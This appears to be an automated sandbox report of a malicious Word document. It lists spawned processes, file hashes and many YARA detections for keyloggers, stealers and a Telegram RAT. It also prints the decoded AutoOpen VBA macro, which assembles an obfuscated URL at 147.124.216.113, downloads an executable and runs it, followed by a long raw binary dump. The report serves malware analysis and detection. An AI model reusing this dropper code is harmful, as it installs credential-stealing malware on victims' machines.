Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	02:08:29
Start date:	14/01/2025
Path:	C:\Users\Public\Libraries\Nsltarpn.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Nsltarpn.PIF"
Imagebase:	0x400000
File size:	1'443'328 bytes
MD5 hash:	8D3E16CB3CE3940E87A322FBEEAB419F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:08:30
Start date:	14/01/2025
Path:	C:\Users\Public\Libraries\npratlsN.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\npratlsN.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.3432289694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3457231521.00000000218FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000001.1974371913.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	02:08:37
Start date:	14/01/2025
Path:	C:\Users\Public\Libraries\Nsltarpn.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Nsltarpn.PIF"
Imagebase:	0x400000
File size:	1'443'328 bytes
MD5 hash:	8D3E16CB3CE3940E87A322FBEEAB419F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:08:38
Start date:	14/01/2025
Path:	C:\Users\Public\Libraries\npratlsN.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\npratlsN.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000002.3432404801.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000001.2054825787.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

APIs	Meta Information
CreateObject	CreateObject("MSXML2.ServerXMLHTTP")
CreateObject	CreateObject("Adodb.Stream")
Open	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False)
Send
responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06?\x0f\x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x16?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x06?\x00?\x07?\x0f\x00\x00\x00\x00\x00\x00\x00\x00?\x06?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x06\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x06?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00 \x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x06\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x06\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00@???c\x00?\x0f?\x07?\x0f?\x06\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x16\x00\x00?\x16\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03?????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F????\x00?????I??????????F???F???F???F???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????F??????????F?????? ?????\x00???\x03????\x03???F????????????F?????\x00????F?\x00??? ????F?????????????????????\x0b???????????\x00?????F??????F?????????h\x10?\x00\x14j?????????????F????\xfffd?????\x02\x00??????????F??????????????F????????????????????F????????????\x10\x01???\x00??h??j???????????????F??F??F?????\x00????????????????h????????????????\x00?????? ???F??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????F??A\x00???F?j???A\x00???F????????u??F????\x00\x00?????????F??????????????????F??????\x01???????????????????F????F????\x00??????F??F???????????F???????????F????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????F???????????? ????????????????F???????F??F??????????\x00???????????????????F??-?????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????F?\x13??????????\x00h?????????????\x13????\x02\x00??F?\x13??F??F???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????F????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??F????????\xfffd???????????????F???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????F????????????????????F?????????\x00??h\x10?\x00\x01j????F??F???@??????????????F???F???????????\x00?????F????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01? ??????\x00? ??????????F?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????F?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????F?F??F?F\xfffd\x04??F???????????????????@??h???F????h?????????7\x00?????????\x01\x00????????\xfffd\x04??F?????????
Shell	Shell(""brightness.exe"") -> 8092

Strings	Decrypted Strings
"M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
"Ad""od""b.S""tr""ea""m"
"h"
"t"
"t""p:/""/147.124.216.113/albt"
"."
"e"
"x"
"e"
"GET"
"brightness"
"."
"e"
"x"
"e"
"""brightness"
"."
"e"
"x"
"e"""

Line	Instruction	Meta Information
9	Sub AutoOpen()
11	Dim xHttp	executed
16	Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")	CreateObject("MSXML2.ServerXMLHTTP") executed
18	Dim bStrm
20	Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")	CreateObject("Adodb.Stream") executed
24	Dim nirm1
25	nirm1 = "h"
26	Dim nirm2
27	nirm2 = "t"
28	Dim nirm3
29	nirm3 = "t" & "p:/" & "/147.124.216.113/albt"
30	Dim nirm4
31	nirm4 = "."
32	Dim nirm5
33	nirm5 = "e"
34	Dim nirm6
35	nirm6 = "x"
36	Dim nirm7
37	nirm7 = "e"
41	Dim plpl
42	plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
45	xHttp.Open "GET", plpl, False	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False) executed
46	xHttp.Send	Send
52	With bStrm
53	. Type = 1
54	. Open
55	. write xHttp.responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06?\x0f\x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x16?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x06?\x00?\x07?\x0f\x00\x00\x00\x00\x00\x00\x00\x00?\x06?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x06\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x06?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00 \x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x06\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x06\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00@???c\x00?\x0f?\x07?\x0f?\x06\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x16\x00\x00?\x16\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03?????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F???F????\x00?????I??????????F???F???F???F???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????F??????????F?????? ?????\x00???\x03????\x03???F????????????F?????\x00????F?\x00??? ????F?????????????????????\x0b???????????\x00?????F??????F?????????h\x10?\x00\x14j?????????????F????\xfffd?????\x02\x00??????????F??????????????F????????????????????F????????????\x10\x01???\x00??h??j???????????????F??F??F?????\x00????????????????h????????????????\x00?????? ???F??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????F??A\x00???F?j???A\x00???F????????u??F????\x00\x00?????????F??????????????????F??????\x01???????????????????F????F????\x00??????F??F???????????F???????????F????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????F???????????? 